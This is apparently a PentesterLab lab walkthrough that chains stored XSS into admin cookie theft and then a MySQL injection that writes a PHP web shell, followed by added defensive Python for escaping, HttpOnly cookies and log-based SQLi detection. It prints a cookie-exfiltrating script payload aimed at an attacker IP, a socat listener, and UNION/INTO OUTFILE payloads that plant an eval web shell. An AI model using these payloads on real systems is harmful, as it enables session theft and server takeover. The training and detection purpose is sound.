[PentesterLab] XSS and MySQL File

This is an exercise from PentesterLab that reproduces and demonstrates how to exploit XSS and SQL injection vulnerabilities. For more information and the ISO download, please check here. The official course is highly recommended reading: it explains how the vulnerabilities arise and the ways to exploit them.

Difficulty: 2 / 5

Method

  • Scanned the network to discover the target server [Netdiscover]
  • Port scanned the target to discover the running services and open ports [nmap]
  • Web information gathering [whatweb]
  • Web file system structure detection [DirBuster]
  • Interacted with the web server and found the Cross-Site Scripting (XSS) vulnerable point [Firefox]
  • Set up the attacker's server in order to exploit the XSS vulnerability and get the admin session cookie [socat]
  • After obtaining the admin session cookie, logged in as administrator and then found the SQL injection vulnerable point
  • Exploited the SQL injection to upload a web shell

Tools

All the tools used here can be found in Kali Linux.

Walkthrough

By reading the official course PDF, we know that we need to find and exploit an XSS vulnerability to log in as admin. After that, we need to find and exploit a MySQL injection vulnerability in order to upload a webshell and control the target server.

Find and Exploit the XSS vulnerability

The attacker interacts with the web server using the Firefox browser to render the web application on the target. Upon viewing the page, the attacker knows that two goals need to be achieved: first, log in as administrator; then, upload a webshell to the target server.

After browsing around the target web site, the attacker finds that the comment system might be vulnerable to XSS. The attacker tests for an XSS vulnerability by submitting 1337'"><. The result is encouraging: the server side does not filter special characters. So the attacker can exploit the XSS and obtain a cookie with admin privilege.

Write the following XSS exploit code into a comment:

<script> document.write('<img src="http://192.168.1.129/?'+document.cookie+'"/>'); </script>

Set up the attacker's machine to listen on port 80 with the following socat command (the trailing "-" tells socat to write whatever it receives to standard output):

socat TCP-LISTEN:80,reuseaddr,fork -

The attacker will receive the admin session cookie as soon as the administrator opens the comments page.
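As an added, defender-side example (not part of the PentesterLab exercise or of the original post), the following Python shows the two fixes that would have stopped this step: encoding comment text before it is placed in the HTML, and marking the session cookie HttpOnly so that document.cookie cannot read it. The comment list is a constructed sample; the probe and the cookie-stealing payload in it are the strings from the walkthrough. The cookie name PHPSESSID is assumed (a PHP default), not taken from the page.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Constructed sample comments (not from the original page). The second and
# third entries reproduce the probe and the payload used in the walkthrough.
SAMPLE_COMMENTS = [
    ("alice", "Nice post!"),
    ("probe", "1337'\"><"),
    ("attacker",
     "<script> document.write('<img src=\"http://192.168.1.129/?'"
     "+document.cookie+'\"/>'); </script>"),
]


def render_comment(author, body, escape=True):
    """Render one comment as HTML.

    With escape=True every user-controlled value goes through
    html.escape(quote=True), which turns < > & " ' into entities, so any
    markup a user submits is displayed as text instead of parsed as tags.
    escape=False reproduces the vulnerable behaviour (raw concatenation).
    """
    enc = (lambda s: html.escape(s, quote=True)) if escape else (lambda s: s)
    return '<div class="comment"><b>{}</b>: {}</div>'.format(enc(author), enc(body))


def render_page(comments, escape=True):
    """Render the whole comment list; each entry passes through render_comment."""
    return "\n".join(render_comment(a, b, escape) for a, b in comments)


class TagCollector(HTMLParser):
    """Record every start tag the browser-side parser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(rendered_html):
    """Return the list of tag names present in rendered HTML.

    Used as a regression check: only the wrapper tags (div, b) may appear;
    a 'script' or 'img' in the list means user input reached the page as markup.
    """
    collector = TagCollector()
    collector.feed(rendered_html)
    return collector.tags


def session_cookie_header(session_id):
    """Build a Set-Cookie header for the admin session with HttpOnly set.

    With HttpOnly, document.cookie inside an injected script does not expose
    the session id, so the exfiltration image request carries nothing useful.
    (Cookie name PHPSESSID is an assumption, not taken from the exercise.)
    """
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = session_id
    cookie["PHPSESSID"]["httponly"] = True
    cookie["PHPSESSID"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")


if __name__ == "__main__":
    print("vulnerable rendering tags:", tags_in(render_page(SAMPLE_COMMENTS, escape=False)))
    print("hardened rendering tags:  ", tags_in(render_page(SAMPLE_COMMENTS)))
    print(session_cookie_header("constructed-session-id"))
```

Running the script prints the tag list for both renderings: the vulnerable one contains a script tag, the hardened one only the div and b wrappers. The cookie flag is the second layer; output encoding alone already removes the injection, but HttpOnly limits the damage if an encoding gap is missed elsewhere.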

Exploit the MySQL injection vulnerability and upload a webshell

SQL Injection point:

http://192.168.1.149/admin/edit.php?id=2

Try a single quote:

http://192.168.1.149/admin/edit.php?id=2'

Results:

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /var/www/classes/post.php on line 111
Notice: Undefined variable: post in /var/www/classes/post.php on line 115

Now the attacker knows the target web site's absolute path is "/var/www/" (the web root, which is what the INTO OUTFILE step below needs).

Detect backend DB information

attacking code (find the column count):
http://192.168.1.149/admin/edit.php?id=2 order by 4 -- - (OK)
http://192.168.1.149/admin/edit.php?id=2 order by 5 -- - (ERROR)

http://192.168.1.149/admin/edit.php?id=-2 union select 1,@@version,user(),4

Results:

MySQL version: 5.1.72-2
current DB user: root@localhost

Because the web application connects to MySQL as root, the attacker gains root-level database privileges.

Then the attacker is going to upload a webshell.

attacking code:

http://192.168.1.149/admin/edit.php?id=-2 union select 1,2,"<?php @eval($_POST['chopper'])?>",4 into outfile "/var/www/css/t2.php" -- -

attacking code (URL encoded):

http://192.168.1.149/admin/edit.php?id=-2%20union%20select%201%2C2%2C%22%3C%3Fphp%20@eval%28%24_POST%5B%27chopper%27%5D%29%3F%3E%22%2C4%20into%20outfile%20%22%2fvar%2fwww%2fcss%2ft2.php%22%20--%20-e
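As an added example written from the defender's side (not part of the exercise or the original post), the Python below scans web-server access-log lines for the probes used in this section. It URL-decodes each query parameter first, because the final request above is sent encoded and a pattern match on the raw line would miss it, and it applies the check that would have prevented the injection in the first place: the id parameter must be an integer. The log lines are constructed samples modelled on the requests in the walkthrough; the log format (Apache combined) and the parameter name list are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the original page). The request
# targets mirror the probes in the walkthrough; bytes and timestamps are made up.
SAMPLE_LOG = r'''
192.168.1.129 - - [09/May/2015:01:20:01 -0400] "GET /admin/edit.php?id=2 HTTP/1.1" 200 1532
192.168.1.129 - - [09/May/2015:01:20:05 -0400] "GET /admin/edit.php?id=2' HTTP/1.1" 200 812
192.168.1.129 - - [09/May/2015:01:21:10 -0400] "GET /admin/edit.php?id=2%20order%20by%204%20--%20- HTTP/1.1" 200 1532
192.168.1.129 - - [09/May/2015:01:22:30 -0400] "GET /admin/edit.php?id=-2%20union%20select%201,@@version,user(),4 HTTP/1.1" 200 1540
192.168.1.129 - - [09/May/2015:01:28:19 -0400] "GET /admin/edit.php?id=-2%20union%20select%201,2,%22x%22,4%20into%20outfile%20%22/var/www/css/t2.php%22%20--%20- HTTP/1.1" 200 1540
192.168.1.10 - - [09/May/2015:01:30:00 -0400] "GET /admin/edit.php?id=3 HTTP/1.1" 200 1498
'''

# Apache "combined"-style request line: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d+) \S+$'
)

# Signatures of the probing steps shown in the walkthrough, matched against the
# decoded, whitespace-collapsed, lower-cased parameter value.
SQLI_PATTERNS = {
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "into_outfile": re.compile(r"\binto\s+(out|dump)file\b"),
    "server_fingerprint": re.compile(r"@@version|\buser\s*\(\s*\)"),
    "comment_terminator": re.compile(r"--\s|/\*"),
}


def is_integer(value):
    """The validation edit.php should apply: id must be a plain integer."""
    return re.fullmatch(r"-?\d+", value) is not None


def classify(value):
    """Return the names of every SQLi signature found in one decoded value."""
    norm = " ".join(value.split()).lower()
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(norm)]


def scan_log(text, numeric_params=("id",)):
    """Parse log lines, decode their query strings and flag suspicious values.

    Each finding records the line number, client IP, parameter, decoded value
    and the list of reasons: 'non_numeric_id' when an integer-only parameter
    carries anything else, followed by any matched signature names.
    """
    findings = []
    for lineno, line in enumerate(text.strip().splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes values, so the encoded request is seen as sent
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                reasons = []
                if param in numeric_params and not is_integer(value):
                    reasons.append("non_numeric_id")
                reasons.extend(classify(value))
                if reasons:
                    findings.append({"line": lineno, "ip": m.group("ip"),
                                     "param": param, "value": value,
                                     "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("line {line} {ip} {param}={value!r}: {reasons}".format(**f))
```

Note that the single-quote probe triggers no signature at all; it is caught only by the integer check, which is the same rule the application should enforce before the value reaches the query (or, better, a prepared statement with the value bound as an integer). Writing the decoded query to the finding is deliberate: an analyst reading the alert should see the request as MySQL would, not the percent-encoded form.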
2015-05-09 01:28:19 -0400